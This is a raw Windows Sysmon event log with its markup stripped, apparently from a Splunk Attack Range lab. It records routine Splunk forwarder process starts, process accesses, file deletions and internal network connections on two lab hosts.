14:17:21.186{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:21.186{2E1864BB-E13C-6299-0500-000000005F02}416780C:\Windows\system32\csrss.exe{2E1864BB-17F1-629A-4A42-000000005F02}4804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:21.186{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-17F1-629A-4A42-000000005F02}4804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:21.187{2E1864BB-17F1-629A-4A42-000000005F02}4804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044096Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:21.062{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCE34057F19759214DD8843CCFB20D23,SHA256=5B8AC391A482384356713874CEB4D4591B9B6F27BE252AD8B6A8A2F73436A9FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:22.628{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BC6D0A87C9D03FA2AA4C8F13D2941CB,SHA256=0A8A15A64721C7FE3F2213899CE02F64F6637C1F1CDB18AFF3B2A3279FABA8C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044097Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:22.156{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5B6C98C320170A8A4211E4AB0394C00,SHA256=9C957E9468D446B3A7E757137AEA23E0CF3CB9E23FE656A904E1F2685CAA3811,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:23.736{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C84E1DF4977BA971F39D9B4BF98BB620,SHA256=57C84851E8A6CBE3E191E0132D07FF6418AFC2CBDA082E397544B5F83EDFFB5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044098Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:23.250{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5372AAD08E690278E45384BE358E32DC,SHA256=81DD26525A981E8A7918B1FFB8A04323584D35ACED1A0D446846029CCDDE23A8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:23.158{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-17F3-629A-4B42-000000005F02}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:23.158{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:23.158{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:23.158{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:23.158{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:23.158{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-17F3-629A-4B42-000000005F02}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:23.158{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-17F3-629A-4B42-000000005F02}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:23.152{2E1864BB-17F3-629A-4B42-000000005F02}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:24.822{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1ACA5B72D6085C7376C9B1AB11C6002,SHA256=A63B9FB486DD76CF5A6A4781D6A0665CCDD8F4562BF02BA4CE01F02FB8BB2F8A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044100Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:22.795{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52336-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044099Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:24.343{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCCE31A98AA529FAE7A00649575AC15A,SHA256=0CD587DE3FFEBCD380118FB4BDCC53034A4E08069CD08EADF71889D3A046C69A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:24.190{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=641B12891A511FF34A6A221ED68A4B46,SHA256=9934256DDFD596362174E6EC5B6FA7A3E4A3CDE27E4CC45D9DF9219C209A47D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:25.854{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F81786D7C29294AB2DD43C3B278DDF1,SHA256=1E4DF164FD78B4E25096C8495B338E6A2505F0D07C5F443C94ACD2C6F21D72DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044101Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:25.437{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69E8F0E5FFB7C77AFBD5D8C69E6D0DFE,SHA256=EBF65B6A9D940776022E2B0DD601AAF510CDF30A1B06162664BCBE44D8E80389,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:26.990{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15FAE139ABF05DA8586B75EDB21FDE36,SHA256=638DA392EAADAAEF3654CCF280673F362147AF1E5F87B1207EF8AD9CB02E60A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044102Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:26.531{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11BDFEAC71A45821B04880BAA9B026D6,SHA256=BD5A35B1BF5BB2A983F337DCD3332F1AF506AA3BEA2B26A94934D9FD9B698173,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044103Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:27.625{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=133A766DB0F82D27C40D93236945269B,SHA256=18C6FD09F11C69F1675752D9787E02B121C91F2387104E7746A612BEF0992D99,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:24.862{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56363-false10.0.1.12-8000- 23542300x800000000000000044104Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:28.718{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55EC9EC895EA13BEBD37E8A1440D0D74,SHA256=1A3C3D59E2E57184CD4835BD8AC4CA11DBAD0DE2E31E50DC8E7C12667DCCFA09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:28.090{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE5A92D7BFCB1042DA82FC6A55B099D2,SHA256=EF93FA6543AC6C1B864481C0496AD086A9B643F1BEFABEA222182ABA35DEA1A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044105Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:29.812{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A076652E97A6586306FADF05DD569C6,SHA256=C19BE1BD963BC95F1A05F09F17B89726ED53E767C4F1469EADF14238C8ED8236,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:29.191{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33206981519BDA2967D0CA90D55F2A3C,SHA256=B748C93E1EDEB9E6B558E0DACB36F5CA17D247C1F56DF8B833AEBA9157C727DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044106Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:30.906{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=863CC551C75D67C19759AAB532E8701C,SHA256=2F9EF39FB966F640083744949EB7CA20194DB4C8245C9A64DDA483A90FA95E28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:30.307{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46888BCF48498EE2A3108647D62C9E8A,SHA256=5F00EBBC074955DB7C32D2BB439FBCDCFFB9124F36A2A7E51FC9D5352AB55C2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:31.377{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8E866D4992730A8D6FCD48B2F0239CE,SHA256=0B3AC7E5B4073324858366556C8A094897AE67D56568D1F681982E8C85F198D1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044107Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:28.592{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52337-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000205232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:32.494{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=294E8FC63631C9707BC3580432506DCB,SHA256=9181417D548286F89D1B4CE2EE56C918157BF812F9DF9BB42636F6F23E2C69D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044108Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:32.000{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C86527B6A119A43BDAF253935AB86536,SHA256=3F617BA48A45DBA437EBB94C72DA1AB38AC424AEA0B14A562875379AAD2D6419,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:33.540{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5C47767AF8C82674B54B80AAB3E121F,SHA256=A7B1DBE56B9D6C6682AB84C8ACE343BB1CE8A66AE57AF9E85256F4BBD409224E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044109Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:33.094{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B24201F419CA7B7AFAE6E205DD3C631,SHA256=A5253B0B4ED6E128346B86B4E1DCD8F95AFBD47C10F31A4257B69370FB9CED16,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:30.864{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56364-false10.0.1.12-8000- 23542300x8000000000000000205235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:34.558{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1103F598B9C94DC221CAD0F76F8F433C,SHA256=B9F270FB2A499D4D979EE5994EFE03254A26529B406F4F1CFEEF8B6F75969410,IMPHASH=00000000000000000000000000000000falsetrue 